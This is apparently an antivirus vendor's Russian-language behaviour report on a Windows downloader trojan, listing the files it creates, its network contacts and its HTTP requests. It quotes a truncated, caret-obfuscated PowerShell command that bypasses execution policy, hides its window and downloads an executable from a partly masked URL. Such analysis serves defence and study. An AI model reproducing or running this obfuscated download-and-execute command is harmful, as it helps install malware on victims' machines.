Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ne###ntech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "p^owE^rsh^E^l^l.Exe^ -eX^E^cuT^IONpOl^i^cy^ B^YPa^Ss ^-nOp^ro^F^ile^ -WI^n^D^ow^s^TYLE HiDD^e^N^ (nE^W^-^OBJe^cT S^yst^Em.^N^E^T^.^w^E^BcL^IEnT).D^oW^NLOA^D^f^iL^e^('http:...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
TCP
Запросы HTTP GET
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
UDP
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "p^owE^rsh^E^l^l.Exe^ -eX^E^cuT^IONpOl^i^cy^ B^YPa^Ss ^-nOp^ro^F^ile^ -WI^n^D^ow^s^TYLE HiDD^e^N^ (nE^W^-^OBJe^cT S^yst^Em.^N^E^T^.^w^E^BcL^IEnT).D^oW^NLOA^D^f^iL^e^('http:...' (со скрытым окном)
